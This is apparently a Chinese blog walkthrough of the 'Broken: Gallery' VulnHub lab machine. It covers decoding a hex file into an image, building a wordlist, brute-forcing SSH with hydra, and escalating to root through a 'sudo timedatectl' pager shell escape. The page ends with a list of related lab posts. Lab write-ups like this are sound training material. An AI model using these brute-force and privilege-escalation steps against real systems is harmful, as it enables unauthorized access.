broken-gallery靶机

于 2024-08-14 20:09:32 发布
阅读量333 收藏
点赞数 10
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hqy250019/article/details/141199304
版权

扫描IP

端口扫描

目录扫描,没啥发现

访问80端口,可以看到有一些文件

readme.md 中是十六进制的值

将内容写入readme.md中,使用 xxd 转换,查看文件,发现文件头为 JFIF ,是一张图片

将后缀修改为 jpg ,查看图片

mv  readme.bin readme.jpg

一段留言,把上面的一些可能作为账号密码的字符拿下来,写个简单的字典,尝试爆破 ssh

Bob
BROKEN
avrahamcohen.ac
broken

getshell

使用 hydra 进行爆破

hydra -L 1.txt -P 111.txt ssh://192.168.111.151
 
得到账号密码:
broken:broken

ssh连接,连接成功

ssh broken@192.168.111.151

提权

查看当前权限

sudo -l

看到 timedatectl 可以执行root权限,执行命令,提权成功

sudo timedatectl list-timezones
 
!/bin/bash

陽陽yy
关注
  • 10
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
broken-gallery靶机渗透测试
weixin_58786230的博客
08-12 102
【代码】broken-gallery靶机渗透测试。
Broken: Gallery靶机
最新发布
m0_65285254的博客
08-13 105
靶机ip地址为 192.168.153.157。点击查看,目录拼接访问,没有发现什么有用信息。爆破出密码 broken | broken。尝试22端口的ssh进行爆破。
Broken: Gallery靶机复现
weixin_52956666的博客
08-13 165
靶机IP为192.168.112.142。sudo -l查看免密操作。尝试爆破ssh账号密码。靶机设置为NAT模式。查看后发现都没什么用。
vulnhub靶机 broken-gallery(渗透测试详解)
2301_78721909的博客
08-11 124
vulnhub靶机 broken-gallery(渗透测试详解)
sqli-labs-master靶机
10-12
sqli-labs是一个专门为学习和测试SQL注入技术而设计的靶机平台,它提供了多个层次的练习,帮助用户逐步理解和掌握SQL注入的防范与应对策略。 一、sqli-labs靶机介绍 sqli-labs靶机由一系列精心设计的挑战组成,每个...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
C++笔记5•内存管理•
qq_64446190的博客
08-12 930
内存管理
LLama3技术报告笔记(SFT+DPO)
smartcat2010的博客
08-11 119
在原有的2类response基础上,加入一类edited:把人在chosen response上的修改;和经典方法效果是类似的,比经典方法的训练速度快;(经典方法:prompt和每个response分别当作1个样本,预测结果是1个分数)把prompt和2~3个response放在同一个样本里(response顺序打乱)reward model: 基于预训练模式,使用人工标注的Pair数据,得到;(output到底是什么?
第二十五天培训笔记
weixin_70756988的博客
08-12 889
选项表示将所有的依赖和代码打包到一个单独的文件中,这样生成的可执行文件更便于。、设置清华镜像站(从国内下载安装包,提高下载和安装工具速度)文件夹中找到生成的可执行文件。可以将这个可执行文件拷贝。在不替换原有代码的情况下,应对数据库软件的升级)到其他机器上(即使该机器没有安装 Python。数据框架,用于保存从数据库中读取的数据)的工具,通过这个工具,就可以。上面命令执行失败:执行该命令。完成打包后,会在当前目录的。)修改为清华大学的镜像源。有完整的读取数据的工具,是知名的数据分析工具,
谷粒商城实战笔记-175~177-商城业务-检索服务-检索查询接口开发
epitomizelu的专栏
08-13 463
搜索页面搭建完成之后,点击搜索按钮,发送参数给后台服务,后台服务根据参数从Elasticsearch中查询符合条件的数据,返回给前端。
8月13日学习笔记 LVS
weixin_70751701的博客
08-13 817
目标地址散列调度算法先根据请求的目标IP地址,作为散列键 (Hash Key)从静态分配的散列表找出对应的服务器,若该服务器 是可用的且未超载,将请求发送到该服务器,否则返回空。1. 配置两个网卡和两个ip地址,正常来说应该配置两个不同的网段的 ip,一个对外的vip,一个对内的dip,现在主要使用nat的网络模 式,可以配置桥接模式对外,Nat对内,教师机不方便配置桥接模 式,所以都是配置的nat模式,但是一定要分清楚哪个ip是vip,哪个 ip是dip,在物理主机上都要能够ping通。
Linux源码阅读笔记20-PCI设备驱动详解
Lenn Louis' Scribe
08-08 406
【代码】Linux源码阅读笔记20-PCI设备驱动详解。
MongoDB学习笔记(三)
2303_76234920的博客
08-08 246
使用Python操作MongoDB:使用管理员用户:
C++_基本语法笔记_继承和多态
qq_45629864的博客
08-13 437
思想与Java差不多。
江科大/江协科技 STM32学习笔记P21
sususu_2001的博客
08-08 1122
有ADC也有DAC数字模拟转换器,使用DAC可以将数字变量转化为模拟电压,与PWM相比较,PWM也有DAC的功能,同时PWM只有完全导通和完全断开两种状态,没有功率损耗,在直流电机调速这种大功率的应用场景使用PWM来等效模拟量比DAC更好。DAC的应用主要在波形生成,比如信号发生器、音频解码芯片等。AD转换需要花一小段时间,1us表示从AD转换开始到产生结果需要1us,对应AD转换的频率就是1MHz,是STM32ADC的最快转换频率。
kali linux部署upload-labs靶机
09-08
要在Kali Linux上部署upload-labs靶机,您需要按照以下步骤进行操作: 1. 首先,您需要通过SSH连接到一个Linux主机。根据提供的端口和地址,使用以下命令连接到目标主机: `ssh -p 25142 root@node4.buuoj.cn` 2. 下载并解压upload-labs靶机安装包。您可以使用提供的链接下载`upload-labs-0.1.zip`文件。将其解压缩,并将相关文件放入容器中以供运行。 3. 确保您的Kali Linux系统满足Docker的运行要求。首先,检查当前Linux系统的内核版本,使用以下命令: `uname -a` 如果内核版本大于等于3.10,您的系统符合要求。否则,您可能需要更新内核或使用支持Docker的其他系统。 4. 更新apt源以满足下载要求。根据您的具体需求,可能需要更新apt源来获取所需的软件包。 5. 启动upload-labs靶机。根据提供的问题描述,您可能需要进行代码审计,并利用文件包含漏洞,通过URL参数来读取敏感文件。一个示例的URL可能是:`http://your-upload-labs-url/?file=/flag`,其中`your-upload-labs-url`是您部署upload-labs靶机的URL地址。您需要根据具体情况进行进一步的测试和配置。 请注意,这只是一个简要的概述,并且具体的部署步骤可能会因不同的环境和需求而有所不同。建议您参考相关文档和指南以获取更详细的部署信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值